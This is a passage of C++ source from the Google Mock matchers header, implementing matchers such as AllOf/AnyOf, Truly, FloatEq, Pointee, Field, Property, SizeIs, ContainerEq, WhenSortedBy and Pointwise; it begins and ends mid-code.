matchers) { return Matcher<T>(new CombiningMatcher<T>( SafeMatcherCast<T>(matchers.first), SafeMatcherCast<T>(matchers.second))); } }; // VariadicMatcher is used for the variadic implementation of // AllOf(m_1, m_2, ...) and AnyOf(m_1, m_2, ...). // CombiningMatcher<T> is used to recursively combine the provided matchers // (of type Args...). template <template <typename T> class CombiningMatcher, typename... Args> class VariadicMatcher { public: VariadicMatcher(const Args&... matchers) // NOLINT : matchers_(MatcherListType::BuildList(matchers...)) {} // This template type conversion operator allows an // VariadicMatcher<Matcher1, Matcher2...> object to match any type that // all of the provided matchers (Matcher1, Matcher2, ...) can match. template <typename T> operator Matcher<T>() const { return MatcherListType::template CreateMatcher<T, CombiningMatcher>( matchers_); } private: typedef MatcherList<sizeof...(Args), Args...> MatcherListType; const typename MatcherListType::ListType matchers_; GTEST_DISALLOW_ASSIGN_(VariadicMatcher); }; template <typename... Args> using AllOfMatcher = VariadicMatcher<BothOfMatcherImpl, Args...>; #endif // GTEST_LANG_CXX11 // Used for implementing the AllOf(m_1, ..., m_n) matcher, which // matches a value that matches all of the matchers m_1, ..., and m_n. template <typename Matcher1, typename Matcher2> class BothOfMatcher { public: BothOfMatcher(Matcher1 matcher1, Matcher2 matcher2) : matcher1_(matcher1), matcher2_(matcher2) {} // This template type conversion operator allows a // BothOfMatcher<Matcher1, Matcher2> object to match any type that // both Matcher1 and Matcher2 can match. template <typename T> operator Matcher<T>() const { return Matcher<T>(new BothOfMatcherImpl<T>(SafeMatcherCast<T>(matcher1_), SafeMatcherCast<T>(matcher2_))); } private: Matcher1 matcher1_; Matcher2 matcher2_; GTEST_DISALLOW_ASSIGN_(BothOfMatcher); }; // Implements the AnyOf(m1, m2) matcher for a particular argument type // T. We do not nest it inside the AnyOfMatcher class template, as // that will prevent different instantiations of AnyOfMatcher from // sharing the same EitherOfMatcherImpl<T> class. template <typename T> class EitherOfMatcherImpl : public MatcherInterface<T> { public: EitherOfMatcherImpl(const Matcher<T>& matcher1, const Matcher<T>& matcher2) : matcher1_(matcher1), matcher2_(matcher2) {} virtual void DescribeTo(::std::ostream* os) const { *os << "("; matcher1_.DescribeTo(os); *os << ") or ("; matcher2_.DescribeTo(os); *os << ")"; } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "("; matcher1_.DescribeNegationTo(os); *os << ") and ("; matcher2_.DescribeNegationTo(os); *os << ")"; } virtual bool MatchAndExplain(T x, MatchResultListener* listener) const { // If either matcher1_ or matcher2_ matches x, we just need to // explain why *one* of them matches. StringMatchResultListener listener1; if (matcher1_.MatchAndExplain(x, &listener1)) { *listener << listener1.str(); return true; } StringMatchResultListener listener2; if (matcher2_.MatchAndExplain(x, &listener2)) { *listener << listener2.str(); return true; } // Otherwise we need to explain why *both* of them fail. const internal::string s1 = listener1.str(); const internal::string s2 = listener2.str(); if (s1 == "") { *listener << s2; } else { *listener << s1; if (s2 != "") { *listener << ", and " << s2; } } return false; } private: const Matcher<T> matcher1_; const Matcher<T> matcher2_; GTEST_DISALLOW_ASSIGN_(EitherOfMatcherImpl); }; #if GTEST_LANG_CXX11 // AnyOfMatcher is used for the variadic implementation of AnyOf(m_1, m_2, ...). template <typename... Args> using AnyOfMatcher = VariadicMatcher<EitherOfMatcherImpl, Args...>; #endif // GTEST_LANG_CXX11 // Used for implementing the AnyOf(m_1, ..., m_n) matcher, which // matches a value that matches at least one of the matchers m_1, ..., // and m_n. template <typename Matcher1, typename Matcher2> class EitherOfMatcher { public: EitherOfMatcher(Matcher1 matcher1, Matcher2 matcher2) : matcher1_(matcher1), matcher2_(matcher2) {} // This template type conversion operator allows a // EitherOfMatcher<Matcher1, Matcher2> object to match any type that // both Matcher1 and Matcher2 can match. template <typename T> operator Matcher<T>() const { return Matcher<T>(new EitherOfMatcherImpl<T>( SafeMatcherCast<T>(matcher1_), SafeMatcherCast<T>(matcher2_))); } private: Matcher1 matcher1_; Matcher2 matcher2_; GTEST_DISALLOW_ASSIGN_(EitherOfMatcher); }; // Used for implementing Truly(pred), which turns a predicate into a // matcher. template <typename Predicate> class TrulyMatcher { public: explicit TrulyMatcher(Predicate pred) : predicate_(pred) {} // This method template allows Truly(pred) to be used as a matcher // for type T where T is the argument type of predicate 'pred'. The // argument is passed by reference as the predicate may be // interested in the address of the argument. template <typename T> bool MatchAndExplain(T& x, // NOLINT MatchResultListener* /* listener */) const { // Without the if-statement, MSVC sometimes warns about converting // a value to bool (warning 4800). // // We cannot write 'return !!predicate_(x);' as that doesn't work // when predicate_(x) returns a class convertible to bool but // having no operator!(). if (predicate_(x)) return true; return false; } void DescribeTo(::std::ostream* os) const { *os << "satisfies the given predicate"; } void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't satisfy the given predicate"; } private: Predicate predicate_; GTEST_DISALLOW_ASSIGN_(TrulyMatcher); }; // Used for implementing Matches(matcher), which turns a matcher into // a predicate. template <typename M> class MatcherAsPredicate { public: explicit MatcherAsPredicate(M matcher) : matcher_(matcher) {} // This template operator() allows Matches(m) to be used as a // predicate on type T where m is a matcher on type T. // // The argument x is passed by reference instead of by value, as // some matcher may be interested in its address (e.g. as in // Matches(Ref(n))(x)). template <typename T> bool operator()(const T& x) const { // We let matcher_ commit to a particular type here instead of // when the MatcherAsPredicate object was constructed. This // allows us to write Matches(m) where m is a polymorphic matcher // (e.g. Eq(5)). // // If we write Matcher<T>(matcher_).Matches(x) here, it won't // compile when matcher_ has type Matcher<const T&>; if we write // Matcher<const T&>(matcher_).Matches(x) here, it won't compile // when matcher_ has type Matcher<T>; if we just write // matcher_.Matches(x), it won't compile when matcher_ is // polymorphic, e.g. Eq(5). // // MatcherCast<const T&>() is necessary for making the code work // in all of the above situations. return MatcherCast<const T&>(matcher_).Matches(x); } private: M matcher_; GTEST_DISALLOW_ASSIGN_(MatcherAsPredicate); }; // For implementing ASSERT_THAT() and EXPECT_THAT(). The template // argument M must be a type that can be converted to a matcher. template <typename M> class PredicateFormatterFromMatcher { public: explicit PredicateFormatterFromMatcher(const M& m) : matcher_(m) {} // This template () operator allows a PredicateFormatterFromMatcher // object to act as a predicate-formatter suitable for using with // Google Test's EXPECT_PRED_FORMAT1() macro. template <typename T> AssertionResult operator()(const char* value_text, const T& x) const { // We convert matcher_ to a Matcher<const T&> *now* instead of // when the PredicateFormatterFromMatcher object was constructed, // as matcher_ may be polymorphic (e.g. NotNull()) and we won't // know which type to instantiate it to until we actually see the // type of x here. // // We write SafeMatcherCast<const T&>(matcher_) instead of // Matcher<const T&>(matcher_), as the latter won't compile when // matcher_ has type Matcher<T> (e.g. An<int>()). // We don't write MatcherCast<const T&> either, as that allows // potentially unsafe downcasting of the matcher argument. const Matcher<const T&> matcher = SafeMatcherCast<const T&>(matcher_); StringMatchResultListener listener; if (MatchPrintAndExplain(x, matcher, &listener)) return AssertionSuccess(); ::std::stringstream ss; ss << "Value of: " << value_text << "\n" << "Expected: "; matcher.DescribeTo(&ss); ss << "\n Actual: " << listener.str(); return AssertionFailure() << ss.str(); } private: const M matcher_; GTEST_DISALLOW_ASSIGN_(PredicateFormatterFromMatcher); }; // A helper function for converting a matcher to a predicate-formatter // without the user needing to explicitly write the type. This is // used for implementing ASSERT_THAT() and EXPECT_THAT(). template <typename M> inline PredicateFormatterFromMatcher<M> MakePredicateFormatterFromMatcher(const M& matcher) { return PredicateFormatterFromMatcher<M>(matcher); } // Implements the polymorphic floating point equality matcher, which matches // two float values using ULP-based approximation or, optionally, a // user-specified epsilon. The template is meant to be instantiated with // FloatType being either float or double. template <typename FloatType> class FloatingEqMatcher { public: // Constructor for FloatingEqMatcher. // The matcher's input will be compared with rhs. The matcher treats two // NANs as equal if nan_eq_nan is true. Otherwise, under IEEE standards, // equality comparisons between NANs will always return false. We specify a // negative max_abs_error_ term to indicate that ULP-based approximation will // be used for comparison. FloatingEqMatcher(FloatType rhs, bool nan_eq_nan) : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(-1) { } // Constructor that supports a user-specified max_abs_error that will be used // for comparison instead of ULP-based approximation. The max absolute // should be non-negative. FloatingEqMatcher(FloatType rhs, bool nan_eq_nan, FloatType max_abs_error) : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(max_abs_error) { GTEST_CHECK_(max_abs_error >= 0) << ", where max_abs_error is" << max_abs_error; } // Implements floating point equality matcher as a Matcher<T>. template <typename T> class Impl : public MatcherInterface<T> { public: Impl(FloatType rhs, bool nan_eq_nan, FloatType max_abs_error) : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(max_abs_error) {} virtual bool MatchAndExplain(T value, MatchResultListener* /* listener */) const { const FloatingPoint<FloatType> lhs(value), rhs(rhs_); // Compares NaNs first, if nan_eq_nan_ is true. if (lhs.is_nan() || rhs.is_nan()) { if (lhs.is_nan() && rhs.is_nan()) { return nan_eq_nan_; } // One is nan; the other is not nan. return false; } if (HasMaxAbsError()) { // We perform an equality check so that inf will match inf, regardless // of error bounds. If the result of value - rhs_ would result in // overflow or if either value is inf, the default result is infinity, // which should only match if max_abs_error_ is also infinity. return value == rhs_ || fabs(value - rhs_) <= max_abs_error_; } else { return lhs.AlmostEquals(rhs); } } virtual void DescribeTo(::std::ostream* os) const { // os->precision() returns the previously set precision, which we // store to restore the ostream to its original configuration // after outputting. const ::std::streamsize old_precision = os->precision( ::std::numeric_limits<FloatType>::digits10 + 2); if (FloatingPoint<FloatType>(rhs_).is_nan()) { if (nan_eq_nan_) { *os << "is NaN"; } else { *os << "never matches"; } } else { *os << "is approximately " << rhs_; if (HasMaxAbsError()) { *os << " (absolute error <= " << max_abs_error_ << ")"; } } os->precision(old_precision); } virtual void DescribeNegationTo(::std::ostream* os) const { // As before, get original precision. const ::std::streamsize old_precision = os->precision( ::std::numeric_limits<FloatType>::digits10 + 2); if (FloatingPoint<FloatType>(rhs_).is_nan()) { if (nan_eq_nan_) { *os << "isn't NaN"; } else { *os << "is anything"; } } else { *os << "isn't approximately " << rhs_; if (HasMaxAbsError()) { *os << " (absolute error > " << max_abs_error_ << ")"; } } // Restore original precision. os->precision(old_precision); } private: bool HasMaxAbsError() const { return max_abs_error_ >= 0; } const FloatType rhs_; const bool nan_eq_nan_; // max_abs_error will be used for value comparison when >= 0. const FloatType max_abs_error_; GTEST_DISALLOW_ASSIGN_(Impl); }; // The following 3 type conversion operators allow FloatEq(rhs) and // NanSensitiveFloatEq(rhs) to be used as a Matcher<float>, a // Matcher<const float&>, or a Matcher<float&>, but nothing else. // (While Google's C++ coding style doesn't allow arguments passed // by non-const reference, we may see them in code not conforming to // the style. Therefore Google Mock needs to support them.) operator Matcher<FloatType>() const { return MakeMatcher(new Impl<FloatType>(rhs_, nan_eq_nan_, max_abs_error_)); } operator Matcher<const FloatType&>() const { return MakeMatcher( new Impl<const FloatType&>(rhs_, nan_eq_nan_, max_abs_error_)); } operator Matcher<FloatType&>() const { return MakeMatcher(new Impl<FloatType&>(rhs_, nan_eq_nan_, max_abs_error_)); } private: const FloatType rhs_; const bool nan_eq_nan_; // max_abs_error will be used for value comparison when >= 0. const FloatType max_abs_error_; GTEST_DISALLOW_ASSIGN_(FloatingEqMatcher); }; // Implements the Pointee(m) matcher for matching a pointer whose // pointee matches matcher m. The pointer can be either raw or smart. template <typename InnerMatcher> class PointeeMatcher { public: explicit PointeeMatcher(const InnerMatcher& matcher) : matcher_(matcher) {} // This type conversion operator template allows Pointee(m) to be // used as a matcher for any pointer type whose pointee type is // compatible with the inner matcher, where type Pointer can be // either a raw pointer or a smart pointer. // // The reason we do this instead of relying on // MakePolymorphicMatcher() is that the latter is not flexible // enough for implementing the DescribeTo() method of Pointee(). template <typename Pointer> operator Matcher<Pointer>() const { return MakeMatcher(new Impl<Pointer>(matcher_)); } private: // The monomorphic implementation that works for a particular pointer type. template <typename Pointer> class Impl : public MatcherInterface<Pointer> { public: typedef typename PointeeOf<GTEST_REMOVE_CONST_( // NOLINT GTEST_REMOVE_REFERENCE_(Pointer))>::type Pointee; explicit Impl(const InnerMatcher& matcher) : matcher_(MatcherCast<const Pointee&>(matcher)) {} virtual void DescribeTo(::std::ostream* os) const { *os << "points to a value that "; matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "does not point to a value that "; matcher_.DescribeTo(os); } virtual bool MatchAndExplain(Pointer pointer, MatchResultListener* listener) const { if (GetRawPointer(pointer) == NULL) return false; *listener << "which points to "; return MatchPrintAndExplain(*pointer, matcher_, listener); } private: const Matcher<const Pointee&> matcher_; GTEST_DISALLOW_ASSIGN_(Impl); }; const InnerMatcher matcher_; GTEST_DISALLOW_ASSIGN_(PointeeMatcher); }; // Implements the Field() matcher for matching a field (i.e. member // variable) of an object. template <typename Class, typename FieldType> class FieldMatcher { public: FieldMatcher(FieldType Class::*field, const Matcher<const FieldType&>& matcher) : field_(field), matcher_(matcher) {} void DescribeTo(::std::ostream* os) const { *os << "is an object whose given field "; matcher_.DescribeTo(os); } void DescribeNegationTo(::std::ostream* os) const { *os << "is an object whose given field "; matcher_.DescribeNegationTo(os); } template <typename T> bool MatchAndExplain(const T& value, MatchResultListener* listener) const { return MatchAndExplainImpl( typename ::testing::internal:: is_pointer<GTEST_REMOVE_CONST_(T)>::type(), value, listener); } private: // The first argument of MatchAndExplainImpl() is needed to help // Symbian's C++ compiler choose which overload to use. Its type is // true_type iff the Field() matcher is used to match a pointer. bool MatchAndExplainImpl(false_type /* is_not_pointer */, const Class& obj, MatchResultListener* listener) const { *listener << "whose given field is "; return MatchPrintAndExplain(obj.*field_, matcher_, listener); } bool MatchAndExplainImpl(true_type /* is_pointer */, const Class* p, MatchResultListener* listener) const { if (p == NULL) return false; *listener << "which points to an object "; // Since *p has a field, it must be a class/struct/union type and // thus cannot be a pointer. Therefore we pass false_type() as // the first argument. return MatchAndExplainImpl(false_type(), *p, listener); } const FieldType Class::*field_; const Matcher<const FieldType&> matcher_; GTEST_DISALLOW_ASSIGN_(FieldMatcher); }; // Implements the Property() matcher for matching a property // (i.e. return value of a getter method) of an object. template <typename Class, typename PropertyType> class PropertyMatcher { public: // The property may have a reference type, so 'const PropertyType&' // may cause double references and fail to compile. That's why we // need GTEST_REFERENCE_TO_CONST, which works regardless of // PropertyType being a reference or not. typedef GTEST_REFERENCE_TO_CONST_(PropertyType) RefToConstProperty; PropertyMatcher(PropertyType (Class::*property)() const, const Matcher<RefToConstProperty>& matcher) : property_(property), matcher_(matcher) {} void DescribeTo(::std::ostream* os) const { *os << "is an object whose given property "; matcher_.DescribeTo(os); } void DescribeNegationTo(::std::ostream* os) const { *os << "is an object whose given property "; matcher_.DescribeNegationTo(os); } template <typename T> bool MatchAndExplain(const T&value, MatchResultListener* listener) const { return MatchAndExplainImpl( typename ::testing::internal:: is_pointer<GTEST_REMOVE_CONST_(T)>::type(), value, listener); } private: // The first argument of MatchAndExplainImpl() is needed to help // Symbian's C++ compiler choose which overload to use. Its type is // true_type iff the Property() matcher is used to match a pointer. bool MatchAndExplainImpl(false_type /* is_not_pointer */, const Class& obj, MatchResultListener* listener) const { *listener << "whose given property is "; // Cannot pass the return value (for example, int) to MatchPrintAndExplain, // which takes a non-const reference as argument. RefToConstProperty result = (obj.*property_)(); return MatchPrintAndExplain(result, matcher_, listener); } bool MatchAndExplainImpl(true_type /* is_pointer */, const Class* p, MatchResultListener* listener) const { if (p == NULL) return false; *listener << "which points to an object "; // Since *p has a property method, it must be a class/struct/union // type and thus cannot be a pointer. Therefore we pass // false_type() as the first argument. return MatchAndExplainImpl(false_type(), *p, listener); } PropertyType (Class::*property_)() const; const Matcher<RefToConstProperty> matcher_; GTEST_DISALLOW_ASSIGN_(PropertyMatcher); }; // Type traits specifying various features of different functors for ResultOf. // The default template specifies features for functor objects. // Functor classes have to typedef argument_type and result_type // to be compatible with ResultOf. template <typename Functor> struct CallableTraits { typedef typename Functor::result_type ResultType; typedef Functor StorageType; static void CheckIsValid(Functor /* functor */) {} template <typename T> static ResultType Invoke(Functor f, T arg) { return f(arg); } }; // Specialization for function pointers. template <typename ArgType, typename ResType> struct CallableTraits<ResType(*)(ArgType)> { typedef ResType ResultType; typedef ResType(*StorageType)(ArgType); static void CheckIsValid(ResType(*f)(ArgType)) { GTEST_CHECK_(f != NULL) << "NULL function pointer is passed into ResultOf()."; } template <typename T> static ResType Invoke(ResType(*f)(ArgType), T arg) { return (*f)(arg); } }; // Implements the ResultOf() matcher for matching a return value of a // unary function of an object. template <typename Callable> class ResultOfMatcher { public: typedef typename CallableTraits<Callable>::ResultType ResultType; ResultOfMatcher(Callable callable, const Matcher<ResultType>& matcher) : callable_(callable), matcher_(matcher) { CallableTraits<Callable>::CheckIsValid(callable_); } template <typename T> operator Matcher<T>() const { return Matcher<T>(new Impl<T>(callable_, matcher_)); } private: typedef typename CallableTraits<Callable>::StorageType CallableStorageType; template <typename T> class Impl : public MatcherInterface<T> { public: Impl(CallableStorageType callable, const Matcher<ResultType>& matcher) : callable_(callable), matcher_(matcher) {} virtual void DescribeTo(::std::ostream* os) const { *os << "is mapped by the given callable to a value that "; matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "is mapped by the given callable to a value that "; matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(T obj, MatchResultListener* listener) const { *listener << "which is mapped by the given callable to "; // Cannot pass the return value (for example, int) to // MatchPrintAndExplain, which takes a non-const reference as argument. ResultType result = CallableTraits<Callable>::template Invoke<T>(callable_, obj); return MatchPrintAndExplain(result, matcher_, listener); } private: // Functors often define operator() as non-const method even though // they are actualy stateless. But we need to use them even when // 'this' is a const pointer. It's the user's responsibility not to // use stateful callables with ResultOf(), which does't guarantee // how many times the callable will be invoked. mutable CallableStorageType callable_; const Matcher<ResultType> matcher_; GTEST_DISALLOW_ASSIGN_(Impl); }; // class Impl const CallableStorageType callable_; const Matcher<ResultType> matcher_; GTEST_DISALLOW_ASSIGN_(ResultOfMatcher); }; // Implements a matcher that checks the size of an STL-style container. template <typename SizeMatcher> class SizeIsMatcher { public: explicit SizeIsMatcher(const SizeMatcher& size_matcher) : size_matcher_(size_matcher) { } template <typename Container> operator Matcher<Container>() const { return MakeMatcher(new Impl<Container>(size_matcher_)); } template <typename Container> class Impl : public MatcherInterface<Container> { public: typedef internal::StlContainerView< GTEST_REMOVE_REFERENCE_AND_CONST_(Container)> ContainerView; typedef typename ContainerView::type::size_type SizeType; explicit Impl(const SizeMatcher& size_matcher) : size_matcher_(MatcherCast<SizeType>(size_matcher)) {} virtual void DescribeTo(::std::ostream* os) const { *os << "size "; size_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "size "; size_matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { SizeType size = container.size(); StringMatchResultListener size_listener; const bool result = size_matcher_.MatchAndExplain(size, &size_listener); *listener << "whose size " << size << (result ? " matches" : " doesn't match"); PrintIfNotEmpty(size_listener.str(), listener->stream()); return result; } private: const Matcher<SizeType> size_matcher_; GTEST_DISALLOW_ASSIGN_(Impl); }; private: const SizeMatcher size_matcher_; GTEST_DISALLOW_ASSIGN_(SizeIsMatcher); }; // Implements a matcher that checks the begin()..end() distance of an STL-style // container. template <typename DistanceMatcher> class BeginEndDistanceIsMatcher { public: explicit BeginEndDistanceIsMatcher(const DistanceMatcher& distance_matcher) : distance_matcher_(distance_matcher) {} template <typename Container> operator Matcher<Container>() const { return MakeMatcher(new Impl<Container>(distance_matcher_)); } template <typename Container> class Impl : public MatcherInterface<Container> { public: typedef internal::StlContainerView< GTEST_REMOVE_REFERENCE_AND_CONST_(Container)> ContainerView; typedef typename std::iterator_traits< typename ContainerView::type::const_iterator>::difference_type DistanceType; explicit Impl(const DistanceMatcher& distance_matcher) : distance_matcher_(MatcherCast<DistanceType>(distance_matcher)) {} virtual void DescribeTo(::std::ostream* os) const { *os << "distance between begin() and end() "; distance_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "distance between begin() and end() "; distance_matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { #if GTEST_LANG_CXX11 using std::begin; using std::end; DistanceType distance = std::distance(begin(container), end(container)); #else DistanceType distance = std::distance(container.begin(), container.end()); #endif StringMatchResultListener distance_listener; const bool result = distance_matcher_.MatchAndExplain(distance, &distance_listener); *listener << "whose distance between begin() and end() " << distance << (result ? " matches" : " doesn't match"); PrintIfNotEmpty(distance_listener.str(), listener->stream()); return result; } private: const Matcher<DistanceType> distance_matcher_; GTEST_DISALLOW_ASSIGN_(Impl); }; private: const DistanceMatcher distance_matcher_; GTEST_DISALLOW_ASSIGN_(BeginEndDistanceIsMatcher); }; // Implements an equality matcher for any STL-style container whose elements // support ==. This matcher is like Eq(), but its failure explanations provide // more detailed information that is useful when the container is used as a set. // The failure message reports elements that are in one of the operands but not // the other. The failure messages do not report duplicate or out-of-order // elements in the containers (which don't properly matter to sets, but can // occur if the containers are vectors or lists, for example). // // Uses the container's const_iterator, value_type, operator ==, // begin(), and end(). template <typename Container> class ContainerEqMatcher { public: typedef internal::StlContainerView<Container> View; typedef typename View::type StlContainer; typedef typename View::const_reference StlContainerReference; // We make a copy of rhs in case the elements in it are modified // after this matcher is created. explicit ContainerEqMatcher(const Container& rhs) : rhs_(View::Copy(rhs)) { // Makes sure the user doesn't instantiate this class template // with a const or reference type. (void)testing::StaticAssertTypeEq<Container, GTEST_REMOVE_REFERENCE_AND_CONST_(Container)>(); } void DescribeTo(::std::ostream* os) const { *os << "equals "; UniversalPrint(rhs_, os); } void DescribeNegationTo(::std::ostream* os) const { *os << "does not equal "; UniversalPrint(rhs_, os); } template <typename LhsContainer> bool MatchAndExplain(const LhsContainer& lhs, MatchResultListener* listener) const { // GTEST_REMOVE_CONST_() is needed to work around an MSVC 8.0 bug // that causes LhsContainer to be a const type sometimes. typedef internal::StlContainerView<GTEST_REMOVE_CONST_(LhsContainer)> LhsView; typedef typename LhsView::type LhsStlContainer; StlContainerReference lhs_stl_container = LhsView::ConstReference(lhs); if (lhs_stl_container == rhs_) return true; ::std::ostream* const os = listener->stream(); if (os != NULL) { // Something is different. Check for extra values first. bool printed_header = false; for (typename LhsStlContainer::const_iterator it = lhs_stl_container.begin(); it != lhs_stl_container.end(); ++it) { if (internal::ArrayAwareFind(rhs_.begin(), rhs_.end(), *it) == rhs_.end()) { if (printed_header) { *os << ", "; } else { *os << "which has these unexpected elements: "; printed_header = true; } UniversalPrint(*it, os); } } // Now check for missing values. bool printed_header2 = false; for (typename StlContainer::const_iterator it = rhs_.begin(); it != rhs_.end(); ++it) { if (internal::ArrayAwareFind( lhs_stl_container.begin(), lhs_stl_container.end(), *it) == lhs_stl_container.end()) { if (printed_header2) { *os << ", "; } else { *os << (printed_header ? ",\nand" : "which") << " doesn't have these expected elements: "; printed_header2 = true; } UniversalPrint(*it, os); } } } return false; } private: const StlContainer rhs_; GTEST_DISALLOW_ASSIGN_(ContainerEqMatcher); }; // A comparator functor that uses the < operator to compare two values. struct LessComparator { template <typename T, typename U> bool operator()(const T& lhs, const U& rhs) const { return lhs < rhs; } }; // Implements WhenSortedBy(comparator, container_matcher). template <typename Comparator, typename ContainerMatcher> class WhenSortedByMatcher { public: WhenSortedByMatcher(const Comparator& comparator, const ContainerMatcher& matcher) : comparator_(comparator), matcher_(matcher) {} template <typename LhsContainer> operator Matcher<LhsContainer>() const { return MakeMatcher(new Impl<LhsContainer>(comparator_, matcher_)); } template <typename LhsContainer> class Impl : public MatcherInterface<LhsContainer> { public: typedef internal::StlContainerView< GTEST_REMOVE_REFERENCE_AND_CONST_(LhsContainer)> LhsView; typedef typename LhsView::type LhsStlContainer; typedef typename LhsView::const_reference LhsStlContainerReference; // Transforms std::pair<const Key, Value> into std::pair<Key, Value> // so that we can match associative containers. typedef typename RemoveConstFromKey< typename LhsStlContainer::value_type>::type LhsValue; Impl(const Comparator& comparator, const ContainerMatcher& matcher) : comparator_(comparator), matcher_(matcher) {} virtual void DescribeTo(::std::ostream* os) const { *os << "(when sorted) "; matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "(when sorted) "; matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(LhsContainer lhs, MatchResultListener* listener) const { LhsStlContainerReference lhs_stl_container = LhsView::ConstReference(lhs); ::std::vector<LhsValue> sorted_container(lhs_stl_container.begin(), lhs_stl_container.end()); ::std::sort( sorted_container.begin(), sorted_container.end(), comparator_); if (!listener->IsInterested()) { // If the listener is not interested, we do not need to // construct the inner explanation. return matcher_.Matches(sorted_container); } *listener << "which is "; UniversalPrint(sorted_container, listener->stream()); *listener << " when sorted"; StringMatchResultListener inner_listener; const bool match = matcher_.MatchAndExplain(sorted_container, &inner_listener); PrintIfNotEmpty(inner_listener.str(), listener->stream()); return match; } private: const Comparator comparator_; const Matcher<const ::std::vector<LhsValue>&> matcher_; GTEST_DISALLOW_COPY_AND_ASSIGN_(Impl); }; private: const Comparator comparator_; const ContainerMatcher matcher_; GTEST_DISALLOW_ASSIGN_(WhenSortedByMatcher); }; // Implements Pointwise(tuple_matcher, rhs_container). tuple_matcher // must be able to be safely cast to Matcher<tuple<const T1&, const // T2&> >, where T1 and T2 are the types of elements in the LHS // container and the RHS container respectively. template <typename TupleMatcher, typename RhsContainer> class PointwiseMatcher { public: typedef internal::StlContainerView<RhsContainer> RhsView; typedef typename RhsView::type RhsStlContainer; typedef typename RhsStlContainer::value_type RhsValue; // Like ContainerEq, we make a copy of rhs in case the elements in // it are modified after this matcher is created. PointwiseMatcher(const TupleMatcher& tuple_matcher, const RhsContainer& rhs) : tuple_matcher_(tuple_matcher), rhs_(RhsView::Copy(rhs)) { // Makes sure the user doesn't instantiate this class template // with a const or reference type. (void)testing::StaticAssertTypeEq<RhsContainer, GTEST_REMOVE_REFERENCE_AND_CONST_(RhsContainer)>(); } template <typename LhsContainer> operator Matcher<LhsContainer>() const { return MakeMatcher(new Impl<LhsContainer>(tuple_matcher_, rhs_)); } template <typename LhsContainer> class Impl : public MatcherInterface<LhsContainer> { public: typedef internal::StlContainerView< GTEST_REMOVE_REFERENCE_AND_CONST_(LhsContainer)> LhsView; typedef typename LhsView::type LhsStlContainer; typedef typename LhsView::const_reference LhsStlContainerReference; typedef typename LhsStlContainer::value_type LhsValue; // We pass the LHS value and the RHS value to the inner matcher by // reference, as they may be expensive to copy. We must use tuple // instead of pair here, as a pair cannot hold references (C++ 98, // 20.2.2 [lib.pairs]). typedef ::testing::tuple<const LhsValue&, const RhsValue&> InnerMatcherArg; Impl(const TupleMatcher& tuple_matcher, const RhsStlContainer& rhs) // mono_tuple_matcher_ holds a monomorphic version of the tuple matcher. : mono_tuple_matcher_(SafeMatcherCast<InnerMatcherArg>(tuple_matcher)), rhs_(rhs) {} virtual void DescribeTo(::std::ostream* os) const { *os << "contains " << rhs_.size() << " values, where each value and its corresponding value in "; UniversalPrinter<RhsStlContainer>::Print(rhs_, os); *os << " "; mono_tuple_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't contain exactly " << rhs_.size() << " values, or contains a value x at some index i" << " where x and the i-th value of "; UniversalPrint(rhs_, os); *os << " "; mono_tuple_matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(LhsContainer lhs, MatchResultListener* listener) const { LhsStlContainerReference lhs_stl_container = LhsView::ConstReference(lhs); const size_t actual_size = lhs_stl_container.size(); if (actual_size != rhs_.size()) { *listener << "which contains " << actual_size << " values"; return false; } typename LhsStlContainer::const_iterator left = lhs_stl_container.begin(); typename RhsStlContainer::const_iterator right = rhs_.begin(); for (size_t i = 0; i != actual_size; ++i, ++left, ++right) { const InnerMatcherArg value_pair(*left, *right); if (listener->IsInterested()) { StringMatchResultListener inner_listener; if (!mono_tuple_matcher_.MatchAndExplain( value_pair, &inner_listener)) { *listener << "where the value pair ("; UniversalPrint(*left, listener->stream()); *listener << ", "; UniversalPrint(*right, listener->stream()); *listener << ") at index #" << i << " don't match"; PrintIfNotEmpty(inner_listener.str(), listener->stream()); return false; } } else { if (!mono_tuple_matcher_.Matches(value_pair)) return false; } } return true; } private: const Matcher<InnerMatcherArg> mono_tuple_matcher_; const RhsStlContainer rhs_; GTEST_DISALLOW_ASSIGN_(Impl); }; private: const TupleMatcher tuple_matcher_; const RhsStlContainer rhs_; GTEST_DISALLOW_ASSIGN_(PointwiseMatcher); }; // Holds the logic common to ContainsMatcherImpl and EachMatcherImpl. template <typename Container> class QuantifierMatcherImpl : public MatcherInterface<Container> { public: typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer; typedef StlContainerView<RawContainer> View; typedef typename View::type StlContainer; typedef typename View::const_reference StlContainerReference; typedef typename StlContainer::value_type Element; template <typename InnerMatcher> explicit QuantifierMatcherImpl(InnerMatcher inner_matcher) : inner_matcher_( testing::SafeMatcherCast<const Element&>(inner_matcher)) {} // Checks whether: // * All elements in the container match, if all_elements_should_match. // * Any element in the container matches, if !all_elements_should_match. bool MatchAndExplainImpl(bool all_elements_should_match, Container container, MatchResultListener* listener) const { StlContainerReference stl_container = View::ConstReference(container); size_t i = 0; for (typename StlContainer::const_iterator it = stl_container.begin(); it != stl_container.end(); ++it, ++i) { StringMatchResultListener inner_listener; const bool matches = inner_matcher_.MatchAndExplain(*it, &inner_listener); if (matches != all_elements_should_match) { *listener << "whose element #" << i << (matches ? " matches" : " doesn't match"); PrintIfNotEmpty(inner_listener.str(), listener->stream()); return !all_elements_should_match; } } return all_elements_should_match; } protected: const Matcher<const Element&> inner_matcher_; GTEST_DISALLOW_ASSIGN_(QuantifierMatcherImpl); }; // Implements 